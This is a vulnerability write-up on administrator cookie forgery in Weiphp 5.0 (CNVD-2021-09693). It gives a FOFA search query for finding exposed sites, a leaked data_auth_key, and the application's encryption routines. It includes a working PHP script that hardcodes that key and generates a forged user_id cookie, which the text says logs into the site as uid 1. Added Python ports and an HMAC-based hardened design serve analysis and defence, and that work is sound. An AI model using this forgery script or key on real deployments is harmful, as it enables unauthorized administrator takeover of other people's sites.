# Weiphp5.0 Arbitrary User Cookie Forgery CNVD-2021-09693

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

Weiphp5.0 is affected by administrator cookie forgery: with the leaked key material, the application's own encryption routine can be used to produce a valid administrator cookie.

### Affected Versions <a href="#ying-xiang-ban-ben" id="ying-xiang-ban-ben"></a>

Weiphp <= 5.0

### Environment Setup <a href="#huan-jing-da-jian" id="huan-jing-da-jian"></a>

[Weiphp5.0 official download and reference manual](https://www.weiphp.cn/doc/Initialization_database.html)

Set up the site by following the official manual.

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpvPZqPh3zpTdBCKyM%2Fimage.png?alt=media\&token=27d83e60-cd93-428d-b10a-86757e5d79e6)

### FOFA <a href="#fofa" id="fofa"></a>

app="WeiPHP"

### Vulnerability Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

First, obtain the **data\_auth\_key** secret from the database configuration file.

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpvU3pOUhk5xoc105n%2Fimage.png?alt=media\&token=fbe96ede-d3cf-4bb9-83f8-5517f48d7438)

This configuration file can be obtained as described in the previous article, **Weiphp5.0 Front-end Arbitrary File Read**.

```php
'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'
```

Search the code base globally for the places where this key is used.

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpvuq09dfWJ5W8cqms%2Fimage.png?alt=media\&token=82c7ac22-a816-4b4c-b084-ee5bdb13ba53)

This locates the encryption and decryption functions that are built on this key.

**Encryption function think\_encrypt**

```php
function think_encrypt($data, $key = '', $expire = 0)
{
    // Falls back to data_auth_key from the database config; the 32-char md5 hex string is the keystream source
    $key = md5(empty($key) ? config('database.data_auth_key') : $key);

    $data = base64_encode($data);
    $x = 0;
    $len = strlen($data);
    $l = strlen($key);
    $char = '';

    // Repeat the md5 hex key until it is as long as the base64 payload
    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }

        $char .= substr($key, $x, 1);
        $x++;
    }

    // 10-digit expiry prefix stored in the clear; 0 means the token never expires
    $str = sprintf('%010d', $expire ? $expire + time() : 0);

    // Byte-wise addition of payload and keystream; the "% 256" binds only to the key byte,
    // but chr() wraps its argument into 0..255 anyway, so the result is (payload + key) mod 256
    for ($i = 0; $i < $len; $i++) {
        $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);
    }
    // URL-safe base64 of expiry prefix + transformed payload; no integrity tag is appended
    return str_replace(array(
        '+',
        '/',
        '='
    ), array(
        '-',
        '_',
        ''
    ), base64_encode($str));
}
```

**Decryption function think\_decrypt**

```php
function think_decrypt($data, $key = '')
{
    // Same md5 hex keystream source as think_encrypt()
    $key = md5(empty($key) ? config('database.data_auth_key') : $key);
    // Undo the URL-safe substitutions and restore the base64 padding
    $data = str_replace(array(
        '-',
        '_'
    ), array(
        '+',
        '/'
    ), $data);
    $mod4 = strlen($data) % 4;
    if ($mod4) {
        $data .= substr('====', $mod4);
    }
    $data = base64_decode($data);
    // First 10 bytes are the plaintext expiry; the remainder is the keystream-added payload
    $expire = substr($data, 0, 10);
    $data = substr($data, 10);

    // Only a non-zero expiry in the past rejects the token; an expiry of 0 is accepted forever
    if ($expire > 0 && $expire < time()) {
        return '';
    }
    $x = 0;
    $len = strlen($data);
    $l = strlen($key);
    $char = $str = '';

    // Rebuild the same repeated keystream
    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }

        $char .= substr($key, $x, 1);
        $x++;
    }

    // Subtract the keystream byte-wise, wrapping below 0; nothing here verifies that the token is authentic
    for ($i = 0; $i < $len; $i++) {
        if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) {
            $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
        } else {
            $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
        }
    }
    return base64_decode($str);
}
```
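To make the structure of these two routines explicit, the following Python port is added for this write-up; it is not Weiphp's own code, and the key string is a constructed placeholder rather than the leaked value. It shows that the "encryption" is a byte-wise addition of the base64 payload with a keystream derived only from md5(data_auth_key), that the expiry field is 0 by default and stored in the clear, and that nothing in the token is tied to a per-user or per-session secret or protected by an integrity tag. That is why possession of the key alone is sufficient to reproduce a valid cookie.

```python
import base64
import hashlib
import time

# Constructed placeholder key for this example; in Weiphp the real value is data_auth_key in the database config.
EXAMPLE_KEY = "example-data-auth-key-not-the-real-one"


def _keystream(key: str, length: int) -> bytes:
    """Repeat the 32-character md5 hex digest of the key until it covers `length` bytes."""
    k = hashlib.md5(key.encode()).hexdigest().encode()
    return (k * (length // len(k) + 1))[:length]


def think_encrypt(data: str, key: str = EXAMPLE_KEY, expire: int = 0) -> str:
    """Port of think_encrypt(): 10-digit expiry prefix + (base64 payload + keystream) mod 256, URL-safe base64."""
    payload = base64.b64encode(data.encode())
    ks = _keystream(key, len(payload))
    header = b"%010d" % (expire + int(time.time()) if expire else 0)
    body = bytes((d + c) & 0xFF for d, c in zip(payload, ks))
    token = base64.b64encode(header + body).decode()
    return token.replace("+", "-").replace("/", "_").replace("=", "")


def think_decrypt(token: str, key: str = EXAMPLE_KEY) -> str:
    """Port of think_decrypt(): undo the URL-safe encoding, apply the expiry rule, subtract the keystream."""
    t = token.replace("-", "+").replace("_", "/")
    t += "=" * (-len(t) % 4)
    raw = base64.b64decode(t)
    expire, body = int(raw[:10]), raw[10:]
    if 0 < expire < time.time():  # same rule as the PHP: 0 never expires
        return ""
    ks = _keystream(key, len(body))
    payload = bytes((d - c) & 0xFF for d, c in zip(body, ks))
    return base64.b64decode(payload).decode()


def token_expiry(token: str) -> int:
    """Read the expiry prefix without the key: it is a plaintext field, not part of the transformed payload."""
    t = token.replace("-", "+").replace("_", "/")
    t += "=" * (-len(t) % 4)
    return int(base64.b64decode(t)[:10])


def is_deterministic(uid: str, key: str = EXAMPLE_KEY) -> bool:
    """With expire=0 there is no nonce or timestamp, so the same uid and key always produce the same cookie."""
    return think_encrypt(uid, key) == think_encrypt(uid, key)


if __name__ == "__main__":
    cookie = think_encrypt("1")
    print("round trip:", think_decrypt(cookie))
    print("expiry field:", token_expiry(cookie), "(0 = never expires)")
    print("deterministic:", is_deterministic("1"))
```

For incident response this port is also a convenient way to decode a suspicious `user_id` cookie offline once the key has been rotated, since the expiry field and the uid are both recoverable from a captured value.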

Search globally for the places where the decryption function is used.

The file **application\common.php** calls the decryption function as part of authentication:

```php
function is_login()
{
    $user = session('user_auth');
    if (empty($user)) {
        $cookie_uid = cookie('user_id');
        if (!empty($cookie_uid)) {
            $uid = think_decrypt($cookie_uid);
            $userinfo = getUserInfo($uid);
            D('common/User')->autoLogin($userinfo);

            $user = session('user_auth');
        }
    }
    if (empty($user)) {
        return 0;
    } else {
        return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0;
    }
}
```

From this code we can see that when the cookie carries **user\_id=1**, the value is decrypted and the resulting uid is checked; if it is valid, the user is logged into the system.
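For contrast, here is the shape of a remember-me cookie that would not be forgeable from a leaked configuration file alone. This is an added example written for this write-up, not Weiphp's or ThinkPHP's code, and the secret, function names and token layout are assumptions. The token is authenticated with HMAC-SHA256 under a server secret, always carries an expiry, and is verified with a constant-time comparison before any field is trusted; `verify_token()` returns the uid or 0, mirroring `is_login()`.

```python
import base64
import hashlib
import hmac
import secrets
import time

# Constructed server secret for this example; a deployment generates one per install and keeps it
# outside any file the web tier can serve (the previous article's file read would otherwise leak it too).
SERVER_SECRET = secrets.token_bytes(32)


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(uid: int, ttl_seconds: int, secret: bytes = SERVER_SECRET, now=None) -> str:
    """Token = base64(uid|expiry|nonce) '.' hex(HMAC-SHA256(secret, payload)); expiry is mandatory."""
    now = int(time.time()) if now is None else now
    payload = f"{uid}|{now + ttl_seconds}|{secrets.token_hex(8)}".encode()
    tag = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return _b64e(payload) + "." + tag


def verify_token(token: str, secret: bytes = SERVER_SECRET, now=None) -> int:
    """Return the uid on success, else 0. The tag is checked before any field is parsed or trusted."""
    now = int(time.time()) if now is None else now
    try:
        b64, tag = token.split(".", 1)
        payload = _b64d(b64)
    except ValueError:  # malformed token (binascii.Error is a ValueError)
        return 0
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return 0
    try:
        uid, exp, _nonce = payload.decode().split("|")
        uid, exp = int(uid), int(exp)
    except ValueError:
        return 0
    if exp <= now:
        return 0
    return uid


def with_uid_rewritten(token: str, new_uid: int) -> str:
    """Negative-test helper: change the uid field but keep the original tag, to show the tag check rejects it."""
    b64, tag = token.split(".", 1)
    fields = _b64d(b64).decode().split("|")
    fields[0] = str(new_uid)
    return _b64e("|".join(fields).encode()) + "." + tag


if __name__ == "__main__":
    t = issue_token(1, 3600)
    print("valid token ->", verify_token(t))
    print("uid rewritten ->", verify_token(with_uid_rewritten(t, 2)))
    print("wrong secret ->", verify_token(t, secret=b"not-the-server-secret"))
```

Because the uid is authenticated rather than merely obscured, a leaked `data_auth_key` would no longer translate into a login; the nonce additionally lets the server keep a revocation list of issued tokens. An opaque random session identifier stored server-side is an equally sound alternative that needs no cryptography on the cookie at all.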

Encrypting **user\_id=1** locally with the encryption code gives a cookie that logs into the system.

```php
<?php
show_source(__FILE__);
function think_encrypt($data, $key = '', $expire = 0)
{
    $key = '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T';
    $key = md5($key);

    $data = base64_encode($data);
    $x = 0;
    $len = strlen($data);
    $l = strlen($key);
    $char = '';

    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }

        $char .= substr($key, $x, 1);
        $x++;
    }

    $str = sprintf('%010d', $expire ? $expire + time() : 0);

    for ($i = 0; $i < $len; $i++) {
        $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);
    }
    return str_replace(array(
        '+',
        '/',
        '='
    ), array(
        '-',
        '_',
        ''
    ), base64_encode($str));
}

echo 'user_id = ' . think_encrypt($_GET['user_id']);
?>
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpw2c5wDK5i7q7-WtQ%2Fimage.png?alt=media\&token=46edb83b-e8bd-4357-9c2a-55234f8418f0)

Adding **cookie: user\_id=xxxxxxxx** to the request logs in successfully.

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpw89cW-fqWhEjj34b%2Fimage.png?alt=media\&token=57354ff0-a0fe-482e-a2b6-311ebc0981cd)

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpwAV3_PM__caepFI6%2Fimage.png?alt=media\&token=48d4d855-3690-47f7-a23b-1b99008c2c69)

For how to obtain the key, see the previous audit article.
